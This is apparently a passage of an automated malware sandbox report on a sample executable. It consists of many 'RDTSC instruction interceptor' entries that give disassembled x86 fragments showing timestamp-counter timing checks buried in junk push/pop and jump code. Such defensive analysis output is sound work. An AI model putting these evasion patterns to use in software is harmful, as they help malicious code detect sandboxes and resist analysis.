                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C4887 second address: 6C48C4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3331238816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jp 00007F3331238825h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F3331238829h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C48C4 second address: 6C48C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C596F second address: 6C5973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C76A2 second address: 6C7742 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c adc edi, 0FF6E342h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F333124C7D8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D2030h], ebx 0x00000036 movzx edi, dx 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b jmp 00007F333124C7E7h 0x00000040 pushad 0x00000041 jno 00007F333124C7D6h 0x00000047 jmp 00007F333124C7E8h 0x0000004c popad 0x0000004d popad 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F333124C7DFh 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C6895 second address: 6C6899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C6899 second address: 6C689F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C689F second address: 6C68C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333123881Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F333123881Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C68C1 second address: 6C68D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F333124C7E1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C864F second address: 6C8654 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C9830 second address: 6C983F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F333124C7DAh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6CE63F second address: 6CE645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6CE645 second address: 6CE649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6CE649 second address: 6CE657 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6CE657 second address: 6CE65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6CE65B second address: 6CE6C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F3331238818h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ecx 0x00000027 call 00007F3331238818h 0x0000002c pop ecx 0x0000002d mov dword ptr [esp+04h], ecx 0x00000031 add dword ptr [esp+04h], 0000001Ch 0x00000039 inc ecx 0x0000003a push ecx 0x0000003b ret 0x0000003c pop ecx 0x0000003d ret 0x0000003e mov dword ptr [ebp+122D1DF9h], ebx 0x00000044 push 00000000h 0x00000046 mov edi, dword ptr [ebp+122D1EC5h] 0x0000004c push eax 0x0000004d js 00007F3331238824h 0x00000053 pushad 0x00000054 jl 00007F3331238816h 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6CB853 second address: 6CB86F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F333124C7D8h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6CC79B second address: 6CC79F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6CB86F second address: 6CB875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6CB875 second address: 6CB879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6CC849 second address: 6CC84D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6CB932 second address: 6CB938 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6D04D5 second address: 6D04DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6CC84D second address: 6CC853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6D04DB second address: 6D04DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6CB938 second address: 6CB970 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3331238828h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3331238828h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6CC853 second address: 6CC861 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 672290 second address: 672296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6D0D7C second address: 6D0D8F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007F333124C7D6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6D0D8F second address: 6D0D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6D0D93 second address: 6D0D97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6D0D97 second address: 6D0D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6D1C03 second address: 6D1C0E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6DA6F4 second address: 6DA6F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6DF389 second address: 508A29 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F333124C7E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 6E3DAC5Eh 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F333124C7D8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push dword ptr [ebp+122D0D5Dh] 0x00000031 jmp 00007F333124C7E7h 0x00000036 pushad 0x00000037 cld 0x00000038 jmp 00007F333124C7E6h 0x0000003d popad 0x0000003e call dword ptr [ebp+122D1933h] 0x00000044 pushad 0x00000045 jno 00007F333124C7DCh 0x0000004b xor eax, eax 0x0000004d mov dword ptr [ebp+122D2B78h], ebx 0x00000053 mov edx, dword ptr [esp+28h] 0x00000057 jmp 00007F333124C7E5h 0x0000005c mov dword ptr [ebp+122D37BEh], eax 0x00000062 pushad 0x00000063 mov dx, 21D2h 0x00000067 mov eax, dword ptr [ebp+122D3676h] 0x0000006d popad 0x0000006e mov esi, 0000003Ch 0x00000073 mov dword ptr [ebp+122D2B78h], ecx 0x00000079 add esi, dword ptr [esp+24h] 0x0000007d jmp 00007F333124C7E8h 0x00000082 lodsw 0x00000084 mov dword ptr [ebp+122D2B78h], edx 0x0000008a add eax, dword ptr [esp+24h] 0x0000008e clc 0x0000008f mov ebx, dword ptr [esp+24h] 0x00000093 mov dword ptr [ebp+122D2B78h], ebx 0x00000099 nop 0x0000009a push eax 0x0000009b push edx 0x0000009c jmp 00007F333124C7E4h 0x000000a1 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6E54B0 second address: 6E54BE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3331238816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6E54BE second address: 6E54C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6E54C4 second address: 6E54CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6E54CA second address: 6E54D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6E54D0 second address: 6E54D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6E56D3 second address: 6E56DC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6E56DC second address: 6E56E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6E56E2 second address: 6E56E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6E5816 second address: 6E5835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3331238827h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6E5B06 second address: 6E5B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6E5B0E second address: 6E5B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6E5B19 second address: 6E5B42 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F333124C7E4h 0x0000000c jne 00007F333124C7D6h 0x00000012 pop esi 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6E5B42 second address: 6E5B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6E5B4F second address: 6E5B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6E5B53 second address: 6E5B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6E5DFC second address: 6E5E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F333124C7D6h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jne 00007F333124C7D6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6E5E11 second address: 6E5E15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6E5E15 second address: 6E5E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F333124C7D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F333124C7D6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6EDDB3 second address: 6EDDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6EDDB9 second address: 6EDDD9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007F333124C7D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F333124C7E2h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6EDDD9 second address: 6EDDE3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3331238816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6ECBFA second address: 6ECC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6ECC00 second address: 6ECC06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C030F second address: 6C036D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F333124C7DBh 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F333124C7D8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 pushad 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c pop edi 0x0000002d xor esi, 02D506FAh 0x00000033 popad 0x00000034 lea eax, dword ptr [ebp+1248B05Ch] 0x0000003a push ecx 0x0000003b jmp 00007F333124C7DDh 0x00000040 pop edx 0x00000041 push eax 0x00000042 pushad 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C0443 second address: 6C0448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C0448 second address: 6C0475 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F333124C7E3h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C058A second address: 6C059D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3331238818h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C089C second address: 6C08A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C0A79 second address: 6C0A94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3331238827h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C0A94 second address: 6C0AD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 2AAE8D65h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F333124C7D8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 call 00007F333124C7D9h 0x0000002e pushad 0x0000002f pushad 0x00000030 js 00007F333124C7D6h 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C0AD9 second address: 6C0AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C0AE2 second address: 6C0AEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C0AEF second address: 6C0AF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C0AF3 second address: 6C0B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 je 00007F333124C7D8h 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C0B11 second address: 6C0B32 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3331238816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push edx 0x0000000e push edi 0x0000000f jne 00007F3331238816h 0x00000015 pop edi 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C0B32 second address: 6C0B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C0B36 second address: 6C0B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C0C00 second address: 6C0C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C0C85 second address: 6C0C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C0DDC second address: 6C0DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C0DE0 second address: 6C0DFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333123881Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jo 00007F3331238824h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C0DFE second address: 6C0E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C0F27 second address: 6C0F2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C1243 second address: 6C124A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C124A second address: 6C1251 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C1251 second address: 6C125E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C125E second address: 6C1263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C1584 second address: 6C15AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F333124C7E6h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jns 00007F333124C7D8h 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
